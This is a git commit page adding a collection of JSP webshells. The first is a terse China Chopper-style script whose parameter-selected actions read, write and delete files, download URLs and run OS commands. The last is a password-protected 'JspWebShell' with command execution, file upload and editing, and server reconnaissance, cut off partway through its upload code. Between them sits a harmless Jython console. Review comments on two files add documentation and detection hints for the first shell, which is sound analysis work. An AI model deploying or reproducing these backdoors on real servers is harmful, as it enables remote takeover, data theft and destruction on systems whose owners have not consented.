update jsp

tennc 2013-05-28 11:29:04 +08:00
parent f9972ec67d
commit 895a9f205a
42 changed files with 32550 additions and 0 deletions


@ -0,0 +1,59 @@
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="k8";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>
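Review bot: Nothing in this file says what it is, and the `<%! %>` block is a run of two-letter helpers (`AA` … `QQ`) on packed lines, so a reader has to work back from the `if(Z.equals(...))` chain to see that the request parameter named by `Pwd` (`k8`) selects an action `A`–`Q`, with `z1`/`z2` as its arguments and `z0` as the charset. A leading comment such as `<%-- sample: request dispatcher; action in parameter k8, arguments z1/z2, charset z0; reply framed ->| ... |<- --%>` would record that for whoever catalogues it. For detection, the source spells the reply markers as `"->"+"|"` and `"|"+"<-"`, so a file-content rule has to match the concatenated form, while the response body carries the literal `->|` … `|<-` (and `ERROR:// ` on failure). `Pwd` is used only as a parameter name, so there is no credential check to log; the host-side traces are the servlet container spawning a process (action `M` calls `Runtime.exec`) and loading a JDBC driver class named in `z1` (`GC`). The parameter layout resembles what is publicly documented for China Chopper-style server scripts, though the page itself names no family.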

Binary file not shown.


@ -0,0 +1,125 @@
package enigma.shells.jython;
import java.io.*;
import java.awt.*;
import javax.swing.*;
import enigma.console.*;
import enigma.console.java2d.*;
import org.python.core.*;
import org.python.util.*;
public class JythonShell extends JPanel implements Runnable {
public static int DEFAULT_ROWS = 20;
public static int DEFAULT_COLUMNS = 80;
public static int DEFAULT_SCROLLBACK = 100;
public PrintStream out;
public Console console;
public Java2DTextWindow text;
public JScrollPane scrollPane;
public PythonInterpreter interp;
private Color colorBackground = new Color(0, 0, 0);
private Color colorForeground = new Color(187, 187, 187);
private Color colorError = new Color(187, 0, 0);
private Color colorCursor = new Color(187, 187, 0);
public JythonShell() {
this(null, Py.getSystemState());
}
public JythonShell(PyObject dict) {
this(dict, Py.getSystemState());
}
public JythonShell(int columns, int rows, int scrollback) {
this(null, Py.getSystemState(), columns, rows, scrollback);
}
public JythonShell(PyObject dict, PySystemState systemState) {
this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
}
public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
super(new BorderLayout());
text = new Java2DTextWindow(columns, rows, scrollback);
text.setBackground(colorBackground);
scrollPane = new JScrollPane();
scrollPane.setViewportView(text);
add(scrollPane, BorderLayout.CENTER);
console = new DefaultConsoleImpl(text);
out = console.getOutputStream();
interp = new PythonInterpreter(dict, systemState);
interp.setOut(out);
interp.setErr(out);
}
public void run() {
int pos = 0;
int tbs = 4;
String line = "";
String command = "";
for (;;) {
String space = "";
for (int i = 0; i < pos * tbs; i++) {
space += " ";
}
try {
console.setTextAttributes(new TextAttributes(colorCursor));
if (pos > 0) {
out.print(space + "... ");
} else {
out.print(">> ");
}
console.setTextAttributes(new TextAttributes(colorForeground));
line = console.readLine().trim();
if (line.length() == 0 && pos > 0) {
pos--;
} else if (line.endsWith(":")) {
command += space + line + "\n";
pos++;
} else {
command += space + line + "\n";
}
if (pos == 0) {
interp.exec(command);
command = "";
}
} catch (Exception e) {
console.setTextAttributes(new TextAttributes(colorError));
e.printStackTrace();
command = "";
}
}
}
public static void main(String[] argv) {
PySystemState.initialize(System.getProperties(), null, argv);
JFrame frame = new JFrame("Jython Console");
JythonShell console = new JythonShell();
frame.add(console, BorderLayout.CENTER);
frame.pack();
frame.setVisible(true);
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
console.run();
}
}
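Review bot: In `run()`, the catch block switches the console to `colorError` and then calls `e.printStackTrace()`, which writes to `System.err` rather than to the console stream `out`, so a failure raised by `interp.exec(command)` does not appear in the window the colour change applies to; `e.printStackTrace(out);` would send it there. The same handler clears `command` but leaves `pos` untouched, so an exception raised while `pos > 0` (for example from `console.readLine()`) keeps the continuation prompt and indentation; adding `pos = 0;` next to `command = "";` resets both. If `console.readLine()` can return null at end of input, which the page does not show, `.trim()` would throw on every pass of the `for (;;)` loop and the handler would spin, so a null check before `trim()` is worth adding.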


@ -0,0 +1,788 @@
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* <p>Title:JspWebshell </p>
*
* <p>Description: jsp网站管理</p>
*
* <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
* PS:本程序是小弟处于兴趣所写如有疑问请联系QQ:48124012
* @version 1.2
*/
String path="";
String selfName="";
boolean copyfinish=false;
%>
<% selfName=request.getRequestURI();
// String editfile="";
String editfile=request.getParameter("editfile");
if (editfile!=null)
{editfile=new String(editfile.getBytes("ISO8859_1"));
}
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
%>
<%!
String _password ="111";//密码
public String readAllFile(String filePathName) throws IOException
{
FileReader fr = new FileReader(filePathName);
int count = fr.read();
String res="";
while(count != -1)
{
//System.out.print((char)count);
res=res+(char)count;
count = fr.read();
if(count == 13)
{
fr.skip(1);
}
}
fr.close();
return res;
}
public void writeFile(String filePathName,String args) throws IOException
{
FileWriter fw = new FileWriter(filePathName);
PrintWriter out=new PrintWriter(fw);
out.write(args);
out.println();
out.flush();
fw.close();
out.close();
}
public boolean createFile(String filePathName) throws IOException
{
boolean result = false;
File file = new File(filePathName);
if(file.exists())
{
System.out.println("文件已经存在!");
}
else
{
file.createNewFile();
result = true;
System.out.println("文件已经创建!");
}
return result;
}
public boolean createFolder(String fileFolderName)
{
boolean result = false;
try
{
File file = new File(fileFolderName);
if(file.exists())
{
//file.delete();
System.out.println("目录已经存在!");
result = true;
}
else
{
file.mkdir();
System.out.println("目录已经建立!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean DeleteFolder(String filefolderName)
{
boolean result = false;
try
{
File file = new File(filefolderName);
if(file.exists())
{
file.delete();
System.out.println("目录已删除!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean validate(String password) {
if (password.equals(_password)) {
return true;
} else {
return false;
}
}
public String HTMLEncode(String str) {
str = str.replaceAll(" ", "&nbsp;");
str = str.replaceAll("<", "&lt;");
str = str.replaceAll(">", "&gt;");
str = str.replaceAll("\r\n", "<br>");
return str;
}
public String exeCmd(String cmd) {
Runtime runtime = Runtime.getRuntime();
Process proc = null;
String retStr = "";
InputStreamReader insReader = null;
char[] tmpBuffer = new char[1024];
int nRet = 0;
try {
proc = runtime.exec(cmd);
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
retStr += new String(tmpBuffer, 0, nRet);
}
insReader.close();
retStr = HTMLEncode(retStr);
} catch (Exception e) {
retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
} finally {
return retStr;
}
}
public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;
try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
out.write(buffer, 0, nBytes);
}
in.close();
out.close();
} catch (IOException e) {
bRet = false;
}
return bRet;
}
class EnvServlet
{
public long timeUse=0;
public Hashtable htParam=new Hashtable();
private Hashtable htShowMsg=new Hashtable();
public void setHashtable()
{
Properties me=System.getProperties();
Enumeration em=me.propertyNames();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=me.getProperty(strKey);
htParam.put(strKey,strValue);
}
}
public void getHashtable(String strQuery)
{
Enumeration em=htParam.keys();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=new String();
if(strKey.indexOf(strQuery,0)>=0)
{
strValue=(String)htParam.get(strKey);
htShowMsg.put(strKey,strValue);
}
}
}
public String queryHashtable(String strKey)
{
strKey=(String)htParam.get(strKey);
return strKey;
}
/* public long test_int()
{
long timeStart = System.currentTimeMillis();
int i=0;
while(i<3000000)i++;
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}
public long test_sqrt()
{
long timeStart = System.currentTimeMillis();
int i=0;
double db=(double)new Random().nextInt(1000);
while(i<200000){db=Math.sqrt(db);i++;}
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}*/
}
%>
<%
EnvServlet env=new EnvServlet();
env.setHashtable();
//String action=new String(" ");
//String act=new String("action");
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>JspWebShell By 绝对零度</title>
<style>
body {
font-size: 12px;
font-family: "宋体";
background-color: #666666;
}
A {
COLOR: black; TEXT-DECORATION: none
}
A:hover {
COLOR: black; TEXT-DECORATION: underline; none:
}
td {
font-size: 12px;
font-family: "宋体";
color: #000000;
}
input.textbox {
border: black solid 1;
font-size: 12px;
height: 18px;
}
input.button {
font-size: 12px;
font-family: "宋体";
border: black solid 1;
}
td.datarows {
font-size: 12px;
font-family: "宋体";
height: 25px;
color: #000000;
}
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
textarea {
border: black solid 1;
}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body bgcolor="#666666">
<%
//session.setMaxInactiveInterval(_sessionOutTime * 60);
String password=request.getParameter("password");
if (password == null && session.getAttribute("password") == null) {
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
<tr>
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
<tr>
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
version 1.2管理登录 :::...</b></font></TD>
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
绝对零度</FONT></TD>
</tr>
<form name="bctform" method="post">
<tr bgcolor="#999999">
<td height="30" colspan="2" align="center" class="td2">
<input name="password" type="password" class="textbox" id="Textbox" />
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
</td>
</tr>
</form>
</TABLE></td>
</tr>
</TABLE>
</div>
<%
} else {
if (session.getAttribute("password") == null) {
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
%>
<%
File tmpFile = null;
String delfile="";
String delfile1="";
String editpath="";
delfile1=request.getParameter("delfile");
editpath=request.getParameter("filepath");
if (delfile1!=null)
{delfile=new String(delfile1.getBytes("ISO8859_1"));
}
if ( delfile1!= null) {
// out.print(delfile);
tmpFile = new File(delfile);
if (! tmpFile.delete()) {
out.print( "<font color=\"red\">删除失败</font><br>\n");
}
}
%>
<%String editfilecontent=null;
String editfilecontent1=request.getParameter("content");
// out.println(editfilecontent1);
//String save=request.getParameter("save");
if (editfilecontent1!=null)
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
// out.print(editfile);
//out.print(editfilecontent);
if (editfile!=null&editfilecontent!=null)
{try {writeFile(editfile,editfilecontent);}
catch (Exception e) {out.print("写入失败");}
out.print("写入成功");
}
%>
<%request.setCharacterEncoding("GBK");%>
<%//String editfile=request.getParameter("editfile");
//out.print(editfile);
if (request.getParameter("jsptz")!=null)
{%>
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
<CENTER>
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#999999" height="22">
<td width="130" bgcolor="#999999">&nbsp;服务器名</td>
<td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
<%=env.queryHashtable("sun.os.patch.level")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统类型</td>
<td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
<td>&nbsp;服务器操作系统模式</td>
<td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>位</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器所在地区</td>
<td>&nbsp;<%=env.queryHashtable("user.country")%></td>
<td>&nbsp;服务器语言</td>
<td>&nbsp;<%=env.queryHashtable("user.language")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器时区</td>
<td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
<td>&nbsp;服务器时间</td>
<td>&nbsp;<%=new java.util.Date()%> </td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器解译引擎</td>
<td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
<td width="130">&nbsp;服务器端口</td>
<td width="170">&nbsp;<%= request.getServerPort() %></td>
</tr>
<tr bgcolor="#999999" height="22">
<td height="22">&nbsp;当前用户</td>
<td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;用户目录</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td align=left>&nbsp;本文件实际路径</td>
<td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu1'>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;名称</td>
<td width="50%" height="22">&nbsp;英文名称</td>
<td width="20%" height="22">&nbsp;版本</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
</tr>
<%
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
float fPercent=fFreeMemory/fTotalMemory*100;
%>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机剩余内存</td>
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M
</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机分配内存</td>
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M
</td>
</tr>
</table>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;参数名称</td>
<td width="70%" height="22">&nbsp;参数路径</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.class.path </td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.home</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.endorsed.dirs</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.library.path</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.io.tmpdir</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<div id="testspeed" align="center"> </div>
</CENTER></div>
<%}
else{
if (editfile!=null)//if edit
{
%>
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
<table width="99%" height="232" border="0">
<tr>
<td height="226"><form name="form2" method="post" action="">
<p align="center"> 地址:
<input name="editfile" type="text" value="<%=editfile%>" size="50">
</p>
<p align="center">
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
<input type="submit" name="Submit2" value="保存">
</p>
</form> </td>
</tr>
</table>
<p>&nbsp;</p></div>
<%}
else{%>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
<tr bgcolor="#333333">
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
</tr>
<tr bgcolor="#999999">
<td colspan="4"> <font color="#000000">
<%
File[] fs = File.listRoots();
for (int i = 0; i < fs.length; i++){
%>
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>)
</a>
<%}%>
</font></td>
</tr>
<tr bgcolor="#999999">
<td height="10" colspan="4"> <font color="#000000">
<form name="form1" method="post" action="">
<input type="text" name="command" class="button">
<input type="submit" name="Submit" value="CMD命令执行" class="button">
</form>
</font> <p>
<%
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
<%=result == "" ? "&nbsp;" : result%>
<%}%>
</td>
</tr>
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
<tr bgcolor="#999999">
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
<INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
</tr>
</FORM>
<% String fileexe="";
String dir="";
String deldir="";
String scrfile="";
String dstfile="";
fileexe=request.getParameter("fileexe");
dir=request.getParameter("dir");
deldir=request.getParameter("deldir");
scrfile=request.getParameter("scrfile");
dstfile=request.getParameter("dstfile");
if (fileexe!=null)
{
//out.print(path+fileexe);
createFile(path+fileexe);
}
if (dir!=null)
{
//out.print(path+dir);
createFolder(path+dir);
}
if (deldir!=null)
{
//out.print(deldir);
DeleteFolder(deldir);
}
if (scrfile!=null&dstfile!=null)
{
//out.print(scrfile);
//out.print(dstfile);
copyfinish=fileCopy(scrfile, dstfile) ;
}
%>
<tr bgcolor="#CCCCCC">
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
文件夹名:
<input name="dir" type="text" size="10" class="button">
<input type="submit" name="Submit3" value="新建目录" class="button">
</form></td>
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
文件名:
<input name="fileexe" type="text" size="8" class="button">
<input type="submit" name="Submit4" value="新建文件" class="button">
</form></td>
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
文件<input name="scrfile" type="text" size="15"class="button">
复制到
<input name="dstfile" type="text" size="15" class="button">
<input type="submit" name="Submit5" value="复制" class="button">
</form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
</tr>
<%//上传
String tempfilename="";
String up=request.getParameter("up");
// String tempfilepath=request.getParameter("filepath");
// out.print(tempfilepath);
if(up!=null)
{
tempfilename=(String)session.getId();
//String tempfilename=request.getParameter("file");
File f1=new File(tempfilepath,tempfilename);
int n;
try
{
InputStream in=request.getInputStream();
BufferedInputStream my_in=new BufferedInputStream(in);
FileOutputStream fout=new FileOutputStream(f1);
BufferedOutputStream my_out=new BufferedOutputStream(fout);
byte[] b=new byte[10000];
while((n=my_in.read(b))!=-1)
{
my_out.write(b,0,n);
}
my_out.flush();
my_out.close();
fout.close();
my_in.close();
in.close();
// out.print("文件创建成功!<br>");
}
catch(IOException e)
{
out.print("文件创建失败!");
}
try
{
RandomAccessFile random1=new RandomAccessFile(f1,"r");
random1.readLine();
String filename=random1.readLine();
byte[] b=filename.getBytes("ISO-8859-1");
filename=new String(b);
int pointer=filename.lastIndexOf('\\');
filename=filename.substring(pointer+1,filename.length()-1);
File f2=new File(tempfilepath,filename);
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
random1.seek(0);
for(int i=1; i<=4; i++)
{
String tempstr=random1.readLine();
}
long startPoint=random1.getFilePointer();
random1.seek(random1.length());
